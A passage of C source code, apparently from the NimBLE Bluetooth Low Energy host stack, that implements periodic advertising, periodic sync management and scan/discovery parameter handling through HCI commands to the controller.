            ble_hs_unlock();
            return BLE_HS_EBUSY;
        }
#if MYNEWT_VAL(BLE_PERIODIC_ADV)
        if (ble_gap_slave[instance].periodic_op == BLE_GAP_OP_S_PERIODIC_ADV) {
            ble_hs_unlock();
            return BLE_HS_EBUSY;
        }
#endif
    }

    opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_CLEAR_ADV_SETS);

    rc = ble_hs_hci_cmd_tx(opcode, NULL, 0, NULL, 0);
    if (rc != 0) {
        ble_hs_unlock();
        return rc;
    }

    memset(ble_gap_slave, 0, sizeof(ble_gap_slave));
    ble_hs_unlock();

    return 0;
}

#if MYNEWT_VAL(BLE_PERIODIC_ADV)
static int
ble_gap_periodic_adv_params_tx(uint8_t instance,
                               const struct ble_gap_periodic_adv_params *params)
{
    struct ble_hci_le_set_periodic_adv_params_cp cmd;
    uint16_t opcode;

    cmd.adv_handle = instance;

    /* Fill optional fields if application did not specify them.
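     *
     * Intervals are in units of 1.25 ms; e.g. an application requesting a
     * 100 ms periodic interval would pass itvl_min = itvl_max = 80
     * (100 / 1.25).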
     */
    if (params->itvl_min == 0 && params->itvl_max == 0) {
        /* TODO defines for those */
        cmd.min_itvl = htole16(30 / 1.25);   /* 30 ms */
        cmd.max_itvl = htole16(60 / 1.25);   /* 60 ms */
    } else {
        cmd.min_itvl = htole16(params->itvl_min);
        cmd.max_itvl = htole16(params->itvl_max);
    }

    if (params->include_tx_power) {
        cmd.props = BLE_HCI_LE_SET_PERIODIC_ADV_PROP_INC_TX_PWR;
    } else {
        cmd.props = 0;
    }

    opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_PERIODIC_ADV_PARAMS);
    return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0);
}

static int
ble_gap_periodic_adv_params_validate(
    const struct ble_gap_periodic_adv_params *params)
{
    if (!params) {
        return BLE_HS_EINVAL;
    }

    if (params->itvl_min && params->itvl_min < 6) {
        return BLE_HS_EINVAL;
    }

    if (params->itvl_max && params->itvl_max < 6) {
        return BLE_HS_EINVAL;
    }
    return 0;
}

int
ble_gap_periodic_adv_configure(uint8_t instance,
                               const struct ble_gap_periodic_adv_params *params)
{
    int rc;

    if (instance >= BLE_ADV_INSTANCES) {
        return BLE_HS_EINVAL;
    }

    rc = ble_gap_periodic_adv_params_validate(params);
    if (rc) {
        return rc;
    }

    ble_hs_lock();

    /* The corresponding extended advertising instance should be configured */
    if (!ble_gap_slave[instance].configured) {
        ble_hs_unlock();
        return BLE_HS_EINVAL;
    }

    /* Periodic advertising shall not be configured while it is already
     * running.
     * Bluetooth Core Specification, Section 7.8.61
     */
    if (ble_gap_slave[instance].periodic_op == BLE_GAP_OP_S_PERIODIC_ADV) {
        ble_hs_unlock();
        return BLE_HS_EINVAL;
    }

    rc = ble_gap_periodic_adv_params_tx(instance, params);
    if (rc) {
        ble_hs_unlock();
        return rc;
    }

    ble_gap_slave[instance].periodic_configured = 1;

    ble_hs_unlock();

    return 0;
}

int
ble_gap_periodic_adv_start(uint8_t instance)
{
    struct ble_hci_le_set_periodic_adv_enable_cp cmd;
    uint16_t opcode;
    int rc;

    if (instance >= BLE_ADV_INSTANCES) {
        return BLE_HS_EINVAL;
    }

    ble_hs_lock();

    /* Periodic advertising cannot start unless it is configured before */
    if (!ble_gap_slave[instance].periodic_configured) {
        ble_hs_unlock();
        return BLE_HS_EINVAL;
    }

    opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_PERIODIC_ADV_ENABLE);

    cmd.enable = 0x01;
    cmd.adv_handle = instance;

    rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0);
    if (rc != 0) {
        ble_hs_unlock();
        return rc;
    }

    ble_gap_slave[instance].periodic_op = BLE_GAP_OP_S_PERIODIC_ADV;

    ble_hs_unlock();
    return 0;
}

static int
ble_gap_periodic_adv_set(uint8_t instance, struct os_mbuf **data)
{
    /* In this case all data always fits in a single HCI command */
#if MYNEWT_VAL(BLE_EXT_ADV_MAX_SIZE) <= BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN
    static uint8_t buf[sizeof(struct ble_hci_le_set_periodic_adv_data_cp) +
                       MYNEWT_VAL(BLE_EXT_ADV_MAX_SIZE)];
    struct ble_hci_le_set_periodic_adv_data_cp *cmd = (void *) buf;
    uint16_t len = OS_MBUF_PKTLEN(*data);
    uint16_t opcode;

    opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_PERIODIC_ADV_DATA);

    cmd->adv_handle = instance;
    cmd->operation = BLE_HCI_LE_SET_DATA_OPER_COMPLETE;
    cmd->adv_data_len = len;
    os_mbuf_copydata(*data, 0, len, cmd->adv_data);

    os_mbuf_adj(*data, len);
    *data = os_mbuf_trim_front(*data);

    return ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len,
                             NULL, 0);
#else
    static uint8_t buf[sizeof(struct ble_hci_le_set_periodic_adv_data_cp) +
                       BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN];
    struct ble_hci_le_set_periodic_adv_data_cp *cmd = (void *) buf;
    uint16_t len = OS_MBUF_PKTLEN(*data);
    uint16_t opcode;
    uint8_t op;
    int rc;

    opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_PERIODIC_ADV_DATA);
    cmd->adv_handle = instance;

    /* Complete data */
    if (len <= BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN) {
        cmd->operation = BLE_HCI_LE_SET_DATA_OPER_COMPLETE;
        cmd->adv_data_len = len;
        os_mbuf_copydata(*data, 0, len, cmd->adv_data);

        os_mbuf_adj(*data, len);
        *data = os_mbuf_trim_front(*data);

        return ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len,
                                 NULL, 0);
    }

    /* If periodic advertising is already enabled, the operation shall be
     * nothing but 0x03 (Complete), so fragmented data cannot be sent;
     * Bluetooth Core Specification, section 7.8.62.
     */
    if (ble_gap_slave[instance].periodic_op == BLE_GAP_OP_S_PERIODIC_ADV) {
        return BLE_HS_EINVAL;
    }

    /* First fragment */
    op = BLE_HCI_LE_SET_DATA_OPER_FIRST;

    do {
        cmd->operation = op;
        cmd->adv_data_len = BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN;
        os_mbuf_copydata(*data, 0, BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN,
                         cmd->adv_data);

        os_mbuf_adj(*data, BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN);
        *data = os_mbuf_trim_front(*data);

        rc = ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len,
                               NULL, 0);
        if (rc) {
            return rc;
        }

        len -= BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN;
        op = BLE_HCI_LE_SET_DATA_OPER_INT;
    } while (len > BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN);

    /* Last fragment */
    cmd->operation = BLE_HCI_LE_SET_DATA_OPER_LAST;
    cmd->adv_data_len = len;
    os_mbuf_copydata(*data, 0, len, cmd->adv_data);

    os_mbuf_adj(*data, len);
    *data = os_mbuf_trim_front(*data);

    return ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len,
                             NULL, 0);
#endif
}

static int
ble_gap_periodic_adv_set_data_validate(uint8_t instance,
                                       struct os_mbuf *data)
{
    /* The corresponding extended advertising instance should be configured */
    if (!ble_gap_slave[instance].configured) {
        return BLE_HS_EINVAL;
    }

    if (ble_gap_slave[instance].legacy_pdu) {
        return BLE_HS_EINVAL;
    }

    /* One more check states that if the periodic advertising is already
     * enabled, the operation shall be 0x03 (Complete).
     * This check is handled while sending the data to the controller, since
     * the length checks are already performed there; this avoids duplicate
     * code.
     */
    return 0;
}

int
ble_gap_periodic_adv_set_data(uint8_t instance, struct os_mbuf *data)
{
    int rc;

    if (instance >= BLE_ADV_INSTANCES) {
        rc = BLE_HS_EINVAL;
        goto done;
    }

    ble_hs_lock();

    rc = ble_gap_periodic_adv_set_data_validate(instance, data);
    if (rc != 0) {
        ble_hs_unlock();
        goto done;
    }

    rc = ble_gap_periodic_adv_set(instance, &data);

    ble_hs_unlock();

done:
    os_mbuf_free_chain(data);
    return rc;
}

static int
ble_gap_periodic_adv_stop_no_lock(uint8_t instance)
{
    struct ble_hci_le_set_periodic_adv_enable_cp cmd;
    uint16_t opcode;
    int rc;

    cmd.enable = 0x00;
    cmd.adv_handle = instance;

    opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_PERIODIC_ADV_ENABLE);

    rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0);
    if (rc != 0) {
        return rc;
    }

    ble_gap_slave[instance].periodic_op = BLE_GAP_OP_NULL;

    return 0;
}

int
ble_gap_periodic_adv_stop(uint8_t instance)
{
    int rc;

    if (instance >= BLE_ADV_INSTANCES) {
        return BLE_HS_EINVAL;
    }

    ble_hs_lock();
    rc = ble_gap_periodic_adv_stop_no_lock(instance);
    ble_hs_unlock();

    return rc;
}

static void
ble_gap_npl_sync_lost(struct ble_npl_event *ev)
{
    struct ble_hs_periodic_sync *psync;
    struct ble_gap_event event;
    ble_gap_event_fn *cb;
    void *cb_arg;

    /* this psync is no longer on list so no lock needed */
    psync = ble_npl_event_get_arg(ev);
    cb = psync->cb;
    cb_arg = psync->cb_arg;

    memset(&event, 0, sizeof event);

    event.type = BLE_GAP_EVENT_PERIODIC_SYNC_LOST;
    event.periodic_sync_lost.sync_handle = psync->sync_handle;
    event.periodic_sync_lost.reason = BLE_HS_EDONE;

    /* Free the memory occupied by psync as it is no longer needed */
    ble_hs_periodic_sync_free(psync);

    ble_gap_event_listener_call(&event);

    if (cb) {
        cb(&event, cb_arg);
    }
}

int
ble_gap_periodic_adv_sync_create(const ble_addr_t *addr, uint8_t adv_sid,
                                 const struct ble_gap_periodic_sync_params *params,
                                 ble_gap_event_fn *cb, void *cb_arg)
{
    struct ble_hci_le_periodic_adv_create_sync_cp cmd;
    struct ble_hs_periodic_sync *psync;
    uint16_t opcode;
    int rc;

    if (addr && (addr->type > BLE_ADDR_RANDOM)) {
        return BLE_HS_EINVAL;
    }

    if (adv_sid > 0x0f) {
        return BLE_HS_EINVAL;
    }

    if ((params->skip > 0x1f3) || (params->sync_timeout > 0x4000) ||
        (params->sync_timeout < 0x0A)) {
        return BLE_HS_EINVAL;
    }

    ble_hs_lock();

    /* No sync can be created if another sync is still pending */
    if (ble_gap_sync.op == BLE_GAP_OP_SYNC) {
        ble_hs_unlock();
        return BLE_HS_EBUSY;
    }

    /* cannot create another sync if already synchronized */
    if (ble_hs_periodic_sync_find(addr, adv_sid)) {
        ble_hs_unlock();
        return BLE_HS_EALREADY;
    }

    /* preallocate sync element */
    psync = ble_hs_periodic_sync_alloc();
    if (!psync) {
        ble_hs_unlock();
        return BLE_HS_ENOMEM;
    }

    ble_npl_event_init(&psync->lost_ev, ble_gap_npl_sync_lost, psync);

    if (addr) {
        cmd.options = 0x00;
        cmd.peer_addr_type = addr->type;
        memcpy(cmd.peer_addr, addr->val, BLE_DEV_ADDR_LEN);
    } else {
        cmd.options = 0x01;
        cmd.peer_addr_type = BLE_ADDR_ANY->type;
        memcpy(cmd.peer_addr, BLE_ADDR_ANY->val, BLE_DEV_ADDR_LEN);
    }

    cmd.sid = adv_sid;
    cmd.skip = htole16(params->skip);
    cmd.sync_timeout = htole16(params->sync_timeout);
    cmd.sync_cte_type = 0x00;

    opcode = BLE_HCI_OP(BLE_HCI_OGF_LE,
                        BLE_HCI_OCF_LE_PERIODIC_ADV_CREATE_SYNC);

    rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0);
    if (!rc) {
        /* This shall be reset upon receiving sync_established event,
         * or if the sync is cancelled before receiving that event.
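         * (Cancellation is requested with
         * ble_gap_periodic_adv_sync_create_cancel(), defined below.)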
*/ ble_gap_sync.op = BLE_GAP_OP_SYNC; ble_gap_sync.cb = cb; ble_gap_sync.cb_arg = cb_arg; ble_gap_sync.psync = psync; } else { ble_hs_periodic_sync_free(psync); } ble_hs_unlock(); return rc; } int ble_gap_periodic_adv_sync_create_cancel(void) { uint16_t opcode; int rc = 0; ble_hs_lock(); if (ble_gap_sync.op != BLE_GAP_OP_SYNC) { ble_hs_unlock(); return BLE_HS_EBUSY; } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_CREATE_SYNC_CANCEL); rc = ble_hs_hci_cmd_tx(opcode, NULL, 0, NULL, 0); ble_hs_unlock(); return rc; } int ble_gap_periodic_adv_sync_terminate(uint16_t sync_handle) { struct ble_hci_le_periodic_adv_term_sync_cp cmd; struct ble_hs_periodic_sync *psync; uint16_t opcode; int rc; ble_hs_lock(); if (ble_gap_sync.op == BLE_GAP_OP_SYNC) { ble_hs_unlock(); return BLE_HS_EBUSY; } /* The handle must be in the list. If it doesn't exist, it means * that the sync may have been lost at the same moment in which * the app wants to terminate that sync handle */ psync = ble_hs_periodic_sync_find_by_handle(sync_handle); if (!psync) { /* Sync already terminated.*/ ble_hs_unlock(); return BLE_HS_ENOTCONN; } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_TERM_SYNC); cmd.sync_handle = htole16(sync_handle); rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); if (rc == 0) { /* Remove the handle from the list */ ble_hs_periodic_sync_remove(psync); /* send sync_lost event, this is to mimic connection behavior and thus * simplify application error handling */ ble_npl_eventq_put(ble_hs_evq_get(), &psync->lost_ev); } ble_hs_unlock(); return rc; } #if MYNEWT_VAL(BLE_PERIODIC_ADV_SYNC_TRANSFER) int ble_gap_periodic_adv_sync_reporting(uint16_t sync_handle, bool enable) { struct ble_hci_le_periodic_adv_receive_enable_cp cmd; struct ble_hs_periodic_sync *psync; uint16_t opcode; int rc; ble_hs_lock(); if (ble_gap_sync.op == BLE_GAP_OP_SYNC) { ble_hs_unlock(); return BLE_HS_EBUSY; } psync = ble_hs_periodic_sync_find_by_handle(sync_handle); if (!psync) { ble_hs_unlock(); return BLE_HS_ENOTCONN; } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_RECEIVE_ENABLE); cmd.sync_handle = htole16(sync_handle); cmd.enable = enable ? 
0x01 : 0x00; rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); ble_hs_unlock(); return rc; } int ble_gap_periodic_adv_sync_transfer(uint16_t sync_handle, uint16_t conn_handle, uint16_t service_data) { struct ble_hci_le_periodic_adv_sync_transfer_cp cmd; struct ble_hci_le_periodic_adv_sync_transfer_rp rsp; struct ble_hs_periodic_sync *psync; struct ble_hs_conn *conn; uint16_t opcode; int rc; ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); if (!conn) { ble_hs_unlock(); return BLE_HS_ENOTCONN; } psync = ble_hs_periodic_sync_find_by_handle(sync_handle); if (!psync) { ble_hs_unlock(); return BLE_HS_ENOTCONN; } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_SYNC_TRANSFER); cmd.conn_handle = htole16(conn_handle); cmd.sync_handle = htole16(sync_handle); cmd.service_data = htole16(service_data); rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), &rsp, sizeof(rsp)); if (!rc) { BLE_HS_DBG_ASSERT(le16toh(rsp.conn_handle) == conn_handle); } ble_hs_unlock(); return rc; } int ble_gap_periodic_adv_sync_set_info(uint8_t instance, uint16_t conn_handle, uint16_t service_data) { struct ble_hci_le_periodic_adv_set_info_transfer_cp cmd; struct ble_hci_le_periodic_adv_set_info_transfer_rp rsp; struct ble_hs_conn *conn; uint16_t opcode; int rc; if (instance >= BLE_ADV_INSTANCES) { return BLE_HS_EINVAL; } ble_hs_lock(); if (ble_gap_slave[instance].periodic_op != BLE_GAP_OP_S_PERIODIC_ADV) { /* periodic adv not enabled */ ble_hs_unlock(); return BLE_HS_EINVAL; } conn = ble_hs_conn_find(conn_handle); if (!conn) { ble_hs_unlock(); return BLE_HS_ENOTCONN; } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_SET_INFO_TRANSFER); cmd.conn_handle = htole16(conn_handle); cmd.adv_handle = instance; cmd.service_data = htole16(service_data); rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), &rsp, sizeof(rsp)); if (!rc) { BLE_HS_DBG_ASSERT(le16toh(rsp.conn_handle) == conn_handle); } ble_hs_unlock(); return rc; } static int periodic_adv_transfer_enable(uint16_t conn_handle, const struct ble_gap_periodic_sync_params *params) { struct ble_hci_le_periodic_adv_sync_transfer_params_cp cmd; struct ble_hci_le_periodic_adv_sync_transfer_params_rp rsp; uint16_t opcode; int rc; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_SYNC_TRANSFER_PARAMS); cmd.conn_handle = htole16(conn_handle); cmd.sync_cte_type = 0x00; cmd.mode = params->reports_disabled ? 
0x01 : 0x02; cmd.skip = htole16(params->skip); cmd.sync_timeout = htole16(params->sync_timeout); rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), &rsp, sizeof(rsp)); if (!rc) { BLE_HS_DBG_ASSERT(le16toh(rsp.conn_handle) == conn_handle); } return rc; } int ble_gap_periodic_adv_sync_receive(uint16_t conn_handle, const struct ble_gap_periodic_sync_params *params, ble_gap_event_fn *cb, void *cb_arg) { struct ble_hs_conn *conn; int rc; ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); if (!conn) { ble_hs_unlock(); return BLE_HS_ENOTCONN; } if (params) { if (conn->psync) { ble_hs_unlock(); return BLE_HS_EALREADY; } conn->psync = ble_hs_periodic_sync_alloc(); if (!conn->psync) { ble_hs_unlock(); return BLE_HS_ENOMEM; } rc = periodic_adv_transfer_enable(conn_handle, params); if (rc) { ble_hs_periodic_sync_free(conn->psync); conn->psync = NULL; } else { conn->psync->cb = cb; conn->psync->cb_arg = cb_arg; ble_npl_event_init(&conn->psync->lost_ev, ble_gap_npl_sync_lost, conn->psync); } } else { if (!conn->psync) { ble_hs_unlock(); return BLE_HS_EALREADY; } rc = periodic_adv_transfer_disable(conn_handle); if (!rc) { ble_hs_periodic_sync_free(conn->psync); conn->psync = NULL; } } ble_hs_unlock(); return rc; } #endif int ble_gap_add_dev_to_periodic_adv_list(const ble_addr_t *peer_addr, uint8_t adv_sid) { struct ble_hci_le_add_dev_to_periodic_adv_list_cp cmd; uint16_t opcode; if ((peer_addr->type > BLE_ADDR_RANDOM) || (adv_sid > 0x0f)) { return BLE_ERR_INV_HCI_CMD_PARMS; } cmd.peer_addr_type = peer_addr->type; memcpy(cmd.peer_addr, peer_addr->val, BLE_DEV_ADDR_LEN); cmd.sid = adv_sid; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_ADD_DEV_TO_PERIODIC_ADV_LIST); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); } int ble_gap_rem_dev_from_periodic_adv_list(const ble_addr_t *peer_addr, uint8_t adv_sid) { struct ble_hci_le_rem_dev_from_periodic_adv_list_cp cmd; uint16_t opcode; if ((peer_addr->type > BLE_ADDR_RANDOM) || (adv_sid > 0x0f)) { return BLE_ERR_INV_HCI_CMD_PARMS; } cmd.peer_addr_type = peer_addr->type; memcpy(cmd.peer_addr, peer_addr->val, BLE_DEV_ADDR_LEN); cmd.sid = adv_sid; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_REM_DEV_FROM_PERIODIC_ADV_LIST); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); } int ble_gap_clear_periodic_adv_list(void) { uint16_t opcode; int rc = 0; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_CLEAR_PERIODIC_ADV_LIST); rc = ble_hs_hci_cmd_tx(opcode, NULL, 0, NULL, 0); return rc; } int ble_gap_read_periodic_adv_list_size(uint8_t *per_adv_list_size) { struct ble_hci_le_rd_periodic_adv_list_size_rp rsp; uint16_t opcode; int rc = 0; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_RD_PERIODIC_ADV_LIST_SIZE); rc = ble_hs_hci_cmd_tx(opcode, NULL, 0, &rsp, sizeof(rsp)); if (rc != 0) { return rc; } *per_adv_list_size = rsp.list_size; return 0; } #endif /***************************************************************************** * $discovery procedures * *****************************************************************************/ #if MYNEWT_VAL(BLE_EXT_ADV) && NIMBLE_BLE_SCAN static int ble_gap_ext_disc_tx_params(uint8_t own_addr_type, uint8_t filter_policy, const struct ble_hs_hci_ext_scan_param *uncoded_params, const struct ble_hs_hci_ext_scan_param *coded_params) { struct ble_hci_le_set_ext_scan_params_cp *cmd; struct scan_params *params; uint8_t buf[sizeof(*cmd) + 2 * sizeof(*params)]; uint8_t len = sizeof(*cmd); /* Check own addr type */ if (own_addr_type > BLE_HCI_ADV_OWN_ADDR_MAX) { return BLE_ERR_INV_HCI_CMD_PARMS; } /* 
Check scanner filter policy */ if (filter_policy > BLE_HCI_SCAN_FILT_MAX) { return BLE_ERR_INV_HCI_CMD_PARMS; } cmd = (void *) buf; params = cmd->scans; cmd->filter_policy = filter_policy; cmd->own_addr_type = own_addr_type; cmd->phys = 0; if (uncoded_params) { cmd->phys |= BLE_HCI_LE_PHY_1M_PREF_MASK; params->type = uncoded_params->scan_type; params->itvl = htole16(uncoded_params->scan_itvl); params->window = htole16(uncoded_params->scan_window); len += sizeof(*params); params++; } if (coded_params) { cmd->phys |= BLE_HCI_LE_PHY_CODED_PREF_MASK; params->type = coded_params->scan_type; params->itvl = htole16(coded_params->scan_itvl); params->window = htole16(coded_params->scan_window); len += sizeof(*params); params++; } if (!cmd->phys) { return BLE_ERR_INV_HCI_CMD_PARMS; } return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_EXT_SCAN_PARAM), cmd, len, NULL, 0); } static int ble_gap_ext_disc_enable_tx(uint8_t enable, uint8_t filter_duplicates, uint16_t duration, uint16_t period) { struct ble_hci_le_set_ext_scan_enable_cp cmd; cmd.enable = enable; cmd.filter_dup = filter_duplicates; cmd.duration = htole16(duration); cmd.period = htole16(period); return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_EXT_SCAN_ENABLE), &cmd, sizeof(cmd), NULL, 0); } #endif #endif #if NIMBLE_BLE_SCAN #if !MYNEWT_VAL(BLE_EXT_ADV) static int ble_gap_disc_enable_tx(int enable, int filter_duplicates) { struct ble_hci_le_set_scan_enable_cp cmd; uint16_t opcode; cmd.enable = !!enable; cmd.filter_duplicates = !!filter_duplicates; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_SCAN_ENABLE); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); } static int ble_gap_disc_tx_params(uint8_t own_addr_type, const struct ble_gap_disc_params *disc_params) { struct ble_hci_le_set_scan_params_cp cmd; uint16_t opcode; if (disc_params->passive) { cmd.scan_type = BLE_HCI_SCAN_TYPE_PASSIVE; } else { cmd.scan_type = BLE_HCI_SCAN_TYPE_ACTIVE; } cmd.scan_itvl = htole16(disc_params->itvl); cmd.scan_window = htole16(disc_params->window); cmd.own_addr_type = own_addr_type; cmd.filter_policy = disc_params->filter_policy; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_SCAN_PARAMS); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); } #endif static int ble_gap_disc_disable_tx(void) { #if MYNEWT_VAL(BLE_EXT_ADV) return ble_gap_ext_disc_enable_tx(0, 0, 0, 0); #else return ble_gap_disc_enable_tx(0, 0); #endif } static int ble_gap_disc_cancel_no_lock(void) { int rc; STATS_INC(ble_gap_stats, discover_cancel); if (!ble_gap_disc_active()) { rc = BLE_HS_EALREADY; goto done; } rc = ble_gap_disc_disable_tx(); if (rc != 0) { goto done; } ble_gap_master_reset_state(); done: if (rc != 0) { STATS_INC(ble_gap_stats, discover_cancel_fail); } return rc; } #endif int ble_gap_disc_cancel(void) { #if NIMBLE_BLE_SCAN int rc; ble_hs_lock(); rc = ble_gap_disc_cancel_no_lock(); ble_hs_unlock(); return rc; #else return BLE_HS_ENOTSUP; #endif } #if NIMBLE_BLE_SCAN static int ble_gap_disc_ext_validate(uint8_t own_addr_type) { if (own_addr_type > BLE_HCI_ADV_OWN_ADDR_MAX) { return BLE_HS_EINVAL; } if (ble_gap_conn_active()) { return BLE_HS_EBUSY; } if (ble_gap_disc_active()) { return BLE_HS_EALREADY; } if (!ble_hs_is_enabled()) { return BLE_HS_EDISABLED; } if (ble_gap_is_preempted()) { return BLE_HS_EPREEMPTED; } return 0; } #endif #if MYNEWT_VAL(BLE_EXT_ADV) && NIMBLE_BLE_SCAN static void ble_gap_ext_disc_fill_dflts(uint8_t limited, struct ble_hs_hci_ext_scan_param *disc_params) { if 
(disc_params->scan_itvl == 0) { if (limited) { disc_params->scan_itvl = BLE_GAP_LIM_DISC_SCAN_INT; } else { disc_params->scan_itvl = BLE_GAP_SCAN_FAST_INTERVAL_MIN; } } if (disc_params->scan_window == 0) { if (limited) { disc_params->scan_window = BLE_GAP_LIM_DISC_SCAN_WINDOW; } else { disc_params->scan_window = BLE_GAP_SCAN_FAST_WINDOW; } } } static void ble_gap_ext_scan_params_to_hci(const struct ble_gap_ext_disc_params *params, struct ble_hs_hci_ext_scan_param *hci_params) { memset(hci_params, 0, sizeof(*hci_params)); if (params->passive) { hci_params->scan_type = BLE_HCI_SCAN_TYPE_PASSIVE; } else { hci_params->scan_type = BLE_HCI_SCAN_TYPE_ACTIVE; } hci_params->scan_itvl = params->itvl; hci_params->scan_window = params->window; } #endif int ble_gap_ext_disc(uint8_t own_addr_type, uint16_t duration, uint16_t period, uint8_t filter_duplicates, uint8_t filter_policy, uint8_t limited, const struct ble_gap_ext_disc_params *uncoded_params, const struct ble_gap_ext_disc_params *coded_params, ble_gap_event_fn *cb, void *cb_arg) { #if NIMBLE_BLE_SCAN && MYNEWT_VAL(BLE_EXT_ADV) struct ble_hs_hci_ext_scan_param ucp; struct ble_hs_hci_ext_scan_param cp; int rc; STATS_INC(ble_gap_stats, discover); ble_hs_lock(); rc = ble_gap_disc_ext_validate(own_addr_type); if (rc != 0) { goto done; } /* Make a copy of the parameter structure and fill unspecified values with * defaults. */ if (uncoded_params) { ble_gap_ext_scan_params_to_hci(uncoded_params, &ucp); ble_gap_ext_disc_fill_dflts(limited, &ucp); /* XXX: We should do it only once */ if (!uncoded_params->passive) { rc = ble_hs_id_use_addr(own_addr_type); if (rc != 0) { goto done; } } } if (coded_params) { ble_gap_ext_scan_params_to_hci(coded_params, &cp); ble_gap_ext_disc_fill_dflts(limited, &cp); /* XXX: We should do it only once */ if (!coded_params->passive) { rc = ble_hs_id_use_addr(own_addr_type); if (rc != 0) { goto done; } } } ble_gap_master.disc.limited = limited; ble_gap_master.cb = cb; ble_gap_master.cb_arg = cb_arg; rc = ble_gap_ext_disc_tx_params(own_addr_type, filter_policy, uncoded_params ? &ucp : NULL, coded_params ? 
                                 &cp : NULL);
    if (rc != 0) {
        goto done;
    }

    ble_gap_master.op = BLE_GAP_OP_M_DISC;

    rc = ble_gap_ext_disc_enable_tx(1, filter_duplicates, duration, period);
    if (rc != 0) {
        ble_gap_master_reset_state();
        goto done;
    }

    rc = 0;

done:
    ble_hs_unlock();

    if (rc != 0) {
        STATS_INC(ble_gap_stats, discover_fail);
    }
    return rc;
#else
    return BLE_HS_ENOTSUP;
#endif
}

#if NIMBLE_BLE_SCAN && !MYNEWT_VAL(BLE_EXT_ADV)
static void
ble_gap_disc_fill_dflts(struct ble_gap_disc_params *disc_params)
{
    if (disc_params->itvl == 0) {
        if (disc_params->limited) {
            disc_params->itvl = BLE_GAP_LIM_DISC_SCAN_INT;
        } else {
            disc_params->itvl = BLE_GAP_SCAN_FAST_INTERVAL_MIN;
        }
    }

    if (disc_params->window == 0) {
        if (disc_params->limited) {
            disc_params->window = BLE_GAP_LIM_DISC_SCAN_WINDOW;
        } else {
            disc_params->window = BLE_GAP_SCAN_FAST_WINDOW;
        }
    }
}

static int
ble_gap_disc_validate(uint8_t own_addr_type,
                      const struct ble_gap_disc_params *disc_params)
{
    if (disc_params == NULL) {
        return BLE_HS_EINVAL;
    }

    /* Check interval and window */
    if ((disc_params->itvl < BLE_HCI_SCAN_ITVL_MIN) ||
        (disc_params->itvl > BLE_HCI_SCAN_ITVL_MAX) ||
        (disc_params->window < BLE_HCI_SCAN_WINDOW_MIN) ||
        (disc_params->window > BLE_HCI_SCAN_WINDOW_MAX) ||
        (disc_params->itvl < disc_params->window)) {
        return BLE_HS_EINVAL;
    }

    /* Check scanner filter policy */
    if (disc_params->filter_policy > BLE_HCI_SCAN_FILT_MAX) {
        return BLE_HS_EINVAL;
    }

    return ble_gap_disc_ext_validate(own_addr_type);
}
#endif

int
ble_gap_disc(uint8_t own_addr_type, int32_t duration_ms,
             const struct ble_gap_disc_params *disc_params,
             ble_gap_event_fn *cb, void *cb_arg)
{
